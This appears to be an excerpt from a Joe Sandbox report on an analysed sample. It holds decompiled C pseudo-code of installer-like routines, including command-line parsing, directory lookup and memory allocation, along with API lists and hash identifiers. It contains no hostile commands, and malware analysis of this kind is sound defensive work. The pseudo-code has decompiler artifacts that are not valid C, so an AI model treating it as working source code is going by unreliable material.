                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CharPrev
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 122130370-0
                                                                                                                                                                                                    • Opcode ID: d4936ca91fd7448949a5e837e6bbc0c135e3071f78a07ee1394534659a178ca1
                                                                                                                                                                                                    • Instruction ID: ef4c409ca5762be5983c336f5ebe47eebcf3d7cf723880da754b6c345d882051
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4936ca91fd7448949a5e837e6bbc0c135e3071f78a07ee1394534659a178ca1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DF042321042507BD735051D9884B76BFDD9BD6390F15817EE8DEC3209CB554C4683A4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E0013621E() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t5 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    					0x4f0 = 2;
                                                                                                                                                                                                    					_t9 = E0013597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E001344B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                    					 *0x139124 = E00136285();
                                                                                                                                                                                                    					_t9 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00136229
                                                                                                                                                                                                    0x00136230
                                                                                                                                                                                                    0x00136247
                                                                                                                                                                                                    0x0013626a
                                                                                                                                                                                                    0x00136272
                                                                                                                                                                                                    0x00136249
                                                                                                                                                                                                    0x00136255
                                                                                                                                                                                                    0x0013625f
                                                                                                                                                                                                    0x00136264
                                                                                                                                                                                                    0x00136264
                                                                                                                                                                                                    0x00136284

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0013623F
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                      • Part of subcall function 00136285: GetLastError.KERNEL32(00135BBC), ref: 00136285
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 381621628-0
                                                                                                                                                                                                    • Opcode ID: 5971cdbee6760512ac0fe5c3cd8d3491d434e6d996b6ac597433bb341e1caa57
                                                                                                                                                                                                    • Instruction ID: f75f58d70087241f7e1fbb64422600158c7c4c965eb2ecaacb086002afdcf978
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5971cdbee6760512ac0fe5c3cd8d3491d434e6d996b6ac597433bb341e1caa57
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F082B0704208BBE754EB749D06FBF77ACDB64700F41446AB9CAD6192EFB49D848750
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00134B60(signed int _a4) {
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t15 = _a4 * 0x18;
                                                                                                                                                                                                    				if( *((intOrPtr*)(_t15 + 0x138d64)) != 1) {
                                                                                                                                                                                                    					_t9 = FindCloseChangeNotification( *(_t15 + 0x138d74)); // executed
                                                                                                                                                                                                    					if(_t9 == 0) {
                                                                                                                                                                                                    						return _t9 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *((intOrPtr*)(_t15 + 0x138d60)) = 1;
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x138d60)) = 1;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x138d68)) = 0;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x138d70)) = 0;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t15 + 0x138d6c)) = 0;
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x00134b66
                                                                                                                                                                                                    0x00134b74
                                                                                                                                                                                                    0x00134b98
                                                                                                                                                                                                    0x00134ba0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134bac
                                                                                                                                                                                                    0x00134ba4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134ba4
                                                                                                                                                                                                    0x00134b78
                                                                                                                                                                                                    0x00134b7e
                                                                                                                                                                                                    0x00134b84
                                                                                                                                                                                                    0x00134b8a
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00134FA1,00000000), ref: 00134B98
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                    • Opcode ID: 36e7028b48b822d9a5b9878cd43258053758ae470ac90c86254aa7e1c545c231
                                                                                                                                                                                                    • Instruction ID: 1fcc030f74f7c6794331f26af0433070f520ffb755a39293b7721f51f997b7c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36e7028b48b822d9a5b9878cd43258053758ae470ac90c86254aa7e1c545c231
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAF01C31500B089FD7759FBADC00652FBE8AFB5375750092EB4AED2198EB30A841CB90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E001366AE(CHAR* __ecx) {
                                                                                                                                                                                                    				unsigned int _t1;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                    				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                    					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x001366b1
                                                                                                                                                                                                    0x001366ba
                                                                                                                                                                                                    0x001366c7
                                                                                                                                                                                                    0x001366bc
                                                                                                                                                                                                    0x001366be
                                                                                                                                                                                                    0x001366be

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00134777,?,00134E38,?), ref: 001366B1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                    • Opcode ID: c2dd004a7364d12284a89d7d7115ccdfc6cafb7082ff45f97d8f570efde31de9
                                                                                                                                                                                                    • Instruction ID: 5629acd82d97ff48f62a1f14d191b46136bb7c0b7a3b84d1569b289207516041
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2dd004a7364d12284a89d7d7115ccdfc6cafb7082ff45f97d8f570efde31de9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81B092B622244052AA2406726C2A5562845ABC123ABE45B90F032C15E0CB3EC886D004
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00134CA0(long _a4) {
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x00134caa
                                                                                                                                                                                                    0x00134cb1

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,?), ref: 00134CAA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                    • Opcode ID: 9d850a1f3ee5fe9cd9e973e6eb101b8b93d72dc332028ac31ec3918ba2ce6738
                                                                                                                                                                                                    • Instruction ID: 5ed2ed67791fdcab57c497ece72201ef593e79e17fc9552bcc07dc56c805fea6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d850a1f3ee5fe9cd9e973e6eb101b8b93d72dc332028ac31ec3918ba2ce6738
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36B0123204430CB7CF001FC2EC09F853F1DEBC4761F540000F60C454508A7294508696
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00134CC0(void* _a4) {
                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                    			}




                                                                                                                                                                                                    0x00134cc8
                                                                                                                                                                                                    0x00134ccf

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                                                                                    • Opcode ID: b87e75f88433181564d3fa9407f988e16cba30b7001308a41d76c60f01733b4a
                                                                                                                                                                                                    • Instruction ID: 550eac4822aba8da43fdabf03ed74abb9bbcceace69ba910aee45302618d92be
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b87e75f88433181564d3fa9407f988e16cba30b7001308a41d76c60f01733b4a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19B0123100010CB7CF001B42EC088453F1DDBC02607400010F50C414218B3398518585
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                    			E00135C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				CHAR* _v265;
                                                                                                                                                                                                    				char _v266;
                                                                                                                                                                                                    				char _v267;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				CHAR* _v272;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                    				char _v556;
                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                    				CHAR* _t69;
                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				char _t79;
                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                    				intOrPtr _t105;
                                                                                                                                                                                                    				void* _t111;
                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                    				void* _t119;
                                                                                                                                                                                                    				void* _t127;
                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                    				void* _t132;
                                                                                                                                                                                                    				void* _t142;
                                                                                                                                                                                                    				signed int _t143;
                                                                                                                                                                                                    				CHAR* _t144;
                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                    				void* _t146;
                                                                                                                                                                                                    				void* _t147;
                                                                                                                                                                                                    				void* _t149;
                                                                                                                                                                                                    				char _t155;
                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                    				void* _t162;
                                                                                                                                                                                                    				void* _t163;
                                                                                                                                                                                                    				char _t167;
                                                                                                                                                                                                    				char _t170;
                                                                                                                                                                                                    				CHAR* _t173;
                                                                                                                                                                                                    				void* _t177;
                                                                                                                                                                                                    				intOrPtr* _t183;
                                                                                                                                                                                                    				intOrPtr* _t192;
                                                                                                                                                                                                    				CHAR* _t199;
                                                                                                                                                                                                    				void* _t200;
                                                                                                                                                                                                    				CHAR* _t201;
                                                                                                                                                                                                    				void* _t205;
                                                                                                                                                                                                    				void* _t206;
                                                                                                                                                                                                    				int _t209;
                                                                                                                                                                                                    				void* _t210;
                                                                                                                                                                                                    				void* _t212;
                                                                                                                                                                                                    				void* _t213;
                                                                                                                                                                                                    				CHAR* _t218;
                                                                                                                                                                                                    				intOrPtr* _t219;
                                                                                                                                                                                                    				intOrPtr* _t220;
                                                                                                                                                                                                    				signed int _t221;
                                                                                                                                                                                                    				signed int _t223;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t173 = __ecx;
                                                                                                                                                                                                    				_t61 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                    				_push(__ebx);
                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                    				_t209 = 1;
                                                                                                                                                                                                    				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					while(_t209 != 0) {
                                                                                                                                                                                                    						_t67 =  *_t173;
                                                                                                                                                                                                    						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                    							_t173 = CharNextA(_t173);
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v272 = _t173;
                                                                                                                                                                                                    						if(_t67 == 0) {
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t69 = _v272;
                                                                                                                                                                                                    							_t177 = 0;
                                                                                                                                                                                                    							_t213 = 0;
                                                                                                                                                                                                    							_t163 = 0;
                                                                                                                                                                                                    							_t202 = 1;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								if(_t213 != 0) {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L21;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t69 =  *_t69;
                                                                                                                                                                                                    									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t69 = _v272;
                                                                                                                                                                                                    										L21:
                                                                                                                                                                                                    										_t155 =  *_t69;
                                                                                                                                                                                                    										if(_t155 != 0x22) {
                                                                                                                                                                                                    											if(_t202 >= 0x104) {
                                                                                                                                                                                                    												goto L106;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                    												_t177 = _t177 + 1;
                                                                                                                                                                                                    												_t202 = _t202 + 1;
                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											if(_v272[1] == 0x22) {
                                                                                                                                                                                                    												if(_t202 >= 0x104) {
                                                                                                                                                                                                    													L106:
                                                                                                                                                                                                    													_t63 = 0;
                                                                                                                                                                                                    													L125:
                                                                                                                                                                                                    													_pop(_t210);
                                                                                                                                                                                                    													_pop(_t212);
                                                                                                                                                                                                    													_pop(_t162);
                                                                                                                                                                                                    													return E00136CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                    													_t177 = _t177 + 1;
                                                                                                                                                                                                    													_t202 = _t202 + 1;
                                                                                                                                                                                                    													_t157 = 2;
                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                    												if(_t213 != 0) {
                                                                                                                                                                                                    													_t163 = 1;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t213 = 1;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L131;
                                                                                                                                                                                                    								L30:
                                                                                                                                                                                                    								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                    								_t69 = _v272;
                                                                                                                                                                                                    							} while ( *_t69 != 0);
                                                                                                                                                                                                    							if(_t177 >= 0x104) {
                                                                                                                                                                                                    								E00136E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                    								asm("int3");
                                                                                                                                                                                                    								_push(_t221);
                                                                                                                                                                                                    								_t222 = _t223;
                                                                                                                                                                                                    								_t71 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                    								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                    									0x4f0 = 2;
                                                                                                                                                                                                    									_t75 = E0013597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E001344B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                    									 *0x139124 = E00136285();
                                                                                                                                                                                                    									_t75 = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								return E00136CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                    								if(_t213 == 0) {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L40;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                    										_t79 = _v268;
                                                                                                                                                                                                    										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                    											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                    											if(_t83 == 0) {
                                                                                                                                                                                                    												_t202 = 0x521;
                                                                                                                                                                                                    												E001344B9(0, 0x521, 0x131140, 0, 0x40, 0);
                                                                                                                                                                                                    												_t85 =  *0x138588; // 0x0
                                                                                                                                                                                                    												if(_t85 != 0) {
                                                                                                                                                                                                    													CloseHandle(_t85);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												ExitProcess(0);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t87 = _t83 - 4;
                                                                                                                                                                                                    											if(_t87 == 0) {
                                                                                                                                                                                                    												if(_v266 != 0) {
                                                                                                                                                                                                    													if(_v266 != 0x3a) {
                                                                                                                                                                                                    														goto L49;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                    														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                    														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                    														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                    														_t202 = _t50;
                                                                                                                                                                                                    														do {
                                                                                                                                                                                                    															_t88 =  *_t183;
                                                                                                                                                                                                    															_t183 = _t183 + 1;
                                                                                                                                                                                                    														} while (_t88 != 0);
                                                                                                                                                                                                    														if(_t183 == _t202) {
                                                                                                                                                                                                    															goto L49;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t205 = 0x5b;
                                                                                                                                                                                                    															if(E0013667F(_t215, _t205) == 0) {
                                                                                                                                                                                                    																L115:
                                                                                                                                                                                                    																_t206 = 0x5d;
                                                                                                                                                                                                    																if(E0013667F(_t215, _t206) == 0) {
                                                                                                                                                                                                    																	L117:
                                                                                                                                                                                                    																	_t202 =  &_v276;
                                                                                                                                                                                                    																	_v276 = _t167;
                                                                                                                                                                                                    																	if(E00135C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		_t202 = 0x104;
                                                                                                                                                                                                    																		E00131680(0x138c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t202 = 0x5b;
                                                                                                                                                                                                    																	if(E0013667F(_t215, _t202) == 0) {
                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		goto L117;
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																_t202 = 0x5d;
                                                                                                                                                                                                    																if(E0013667F(_t215, _t202) == 0) {
                                                                                                                                                                                                    																	goto L49;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	goto L115;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													 *0x138a24 = 1;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L50;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t100 = _t87 - 1;
                                                                                                                                                                                                    												if(_t100 == 0) {
                                                                                                                                                                                                    													L98:
                                                                                                                                                                                                    													if(_v266 != 0x3a) {
                                                                                                                                                                                                    														goto L49;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                    														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                    														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                    														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                    														_t202 = _t38;
                                                                                                                                                                                                    														do {
                                                                                                                                                                                                    															_t101 =  *_t192;
                                                                                                                                                                                                    															_t192 = _t192 + 1;
                                                                                                                                                                                                    														} while (_t101 != 0);
                                                                                                                                                                                                    														if(_t192 == _t202) {
                                                                                                                                                                                                    															goto L49;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t202 =  &_v276;
                                                                                                                                                                                                    															_v276 = _t170;
                                                                                                                                                                                                    															if(E00135C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                    																goto L49;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                    																_t218 = 0x138b3e;
                                                                                                                                                                                                    																_t105 = _v276;
                                                                                                                                                                                                    																if(_t104 != 0x54) {
                                                                                                                                                                                                    																	_t218 = 0x138a3a;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    																E00131680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                    																_t202 = 0x104;
                                                                                                                                                                                                    																E0013658A(_t218, 0x104, 0x131140);
                                                                                                                                                                                                    																if(E001331E0(_t218) != 0) {
                                                                                                                                                                                                    																	goto L50;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	goto L106;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
